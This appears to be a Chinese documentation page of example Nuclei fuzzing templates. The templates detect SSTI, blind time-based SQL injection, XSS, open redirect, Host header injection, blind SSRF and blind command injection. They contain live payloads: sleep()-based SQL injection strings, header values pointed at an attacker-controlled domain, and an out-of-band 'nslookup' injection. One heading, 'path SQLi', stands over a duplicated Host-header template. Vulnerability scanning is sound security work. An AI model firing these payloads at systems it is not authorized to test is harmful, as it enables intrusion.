基础SSTI模板
一个简单的模板,用于发现{{<number>*<number>}}类型的SSTI漏洞。
Copy
id: fuzz-reflection-ssti
info:
name: Basic Reflection Potential SSTI Detection
author: pdteam
severity: low
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # 仅在GET URL上运行
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
matchers:
- type: word
part: body
words:
- "{{result}}"
盲时间型SQLi模板
一个用于检测盲时间型SQLi的模板,使用时间延迟分析器。Copy
id: mysql-blind-time-based-sqli
info:
name: MySQL SQLi - Blind Time based
author: pdteam
severity: critical
reference:
- https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMySqlScanRule.java
http:
- payloads:
injections:
low:
- " / sleep([SLEEPTIME]) "
- "' / sleep([SLEEPTIME]) / '"
- "\" / sleep([SLEEPTIME]) / \""
medium:
- " and 0 in (select sleep([SLEEPTIME]) ) -- "
- "' and 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" and 0 in (select sleep([SLEEPTIME]) ) -- "
- " where 0 in (select sleep([SLEEPTIME]) ) -- "
- "' where 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" where 0 in (select sleep([SLEEPTIME]) ) -- "
high:
- "\" where 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
- " and 0 in (select sleep([SLEEPTIME]) ) "
- "' and 0 in (select sleep([SLEEPTIME]) ) and ''='"
- "\" and 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
attack: pitchfork
analyzer:
name: time_delay
fuzzing:
- part: request # 模糊测试所有请求部分
type: postfix
mode: single
fuzz:
- "{{injections}}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: analyzer
words:
- "true"
基础XSS模板
一个简单的模板,用于发现HTML页面中的XSS探针反射。Copy
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # 仅在GET URL上运行
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
基础开放重定向模板
一个简单的模板,用于发现开放重定向问题。Copy
id: fuzz-open-redirect
info:
name: Basic Open Redirect Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # 仅在GET URL上运行
payloads:
redirect:
- "https://example.com"
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
fuzz:
- "{{redirect}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "{{redirect}}"
- type: status
status:
- 301
- 302
- 307
基础路径型SQLi
一个用于发现路径型SQLi问题的示例模板。Copy
http:
# 确定是否应执行模板的预条件
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # 仅在方法为POST时运行
- 'contains(path,"reset")' # 仅在路径包含reset字样时运行
condition: and
# 模糊测试规则
fuzzing:
- part: header # 此规则将应用于header
type: replace # replace类型规则(即现有值将被payload替换)
mode: multiple # multiple模式(即所有现有值将同时被替换/使用)
fuzz:
X-Forwarded-For: "{{domain}}" # 这里{{domain}}是攻击者控制的服务器
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
基础Host Header注入
一个简单的模板,用于发现Host Header注入问题。Copy
http:
# 确定是否应执行模板的预条件
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # 仅在方法为POST时运行
- 'contains(path,"reset")' # 仅在路径包含reset字样时运行
condition: and
# 模糊测试规则
fuzzing:
- part: header # 此规则将应用于header
type: replace # replace类型规则(即现有值将被payload替换)
mode: multiple # multiple模式(即所有现有值将同时被替换/使用)
fuzz:
X-Forwarded-For: "{{domain}}" # 这里{{domain}}是攻击者控制的服务器
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
盲SSRF OOB检测
一个简单的模板,使用interactsh和HTTP模糊测试在已知参数中检测盲SSRF。Copy
id: fuzz-ssrf
info:
name: Basic Blind SSRF Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # 仅在GET URL上运行
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
- "path"
- "continue"
- "url"
- "window"
- "next"
- "data"
- "reference"
- "site"
- "html"
- "val"
- "validate"
- "domain"
- "callback"
- "return"
- "page"
- "feed"
- "host"
- "port"
- "to"
- "out"
- "view"
- "dir"
- "show"
- "navigation"
- "open"
fuzz:
- "https://{{redirect}}"
matchers:
- type: word
part: interactsh_protocol # 确认DNS交互
words:
- "http"
盲CMDi基于OOB的检测
一个简单的模板,使用interactsh检测盲命令注入Copy
id: fuzz-cmdi
info:
name: Basic Blind CMDI Detection
author: pdteam
severity: low
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
fuzz:
- "nslookup {{redirect}}"
matchers:
- type: word
part: interactsh_protocol # 确认DNS交互
words:
- "dns"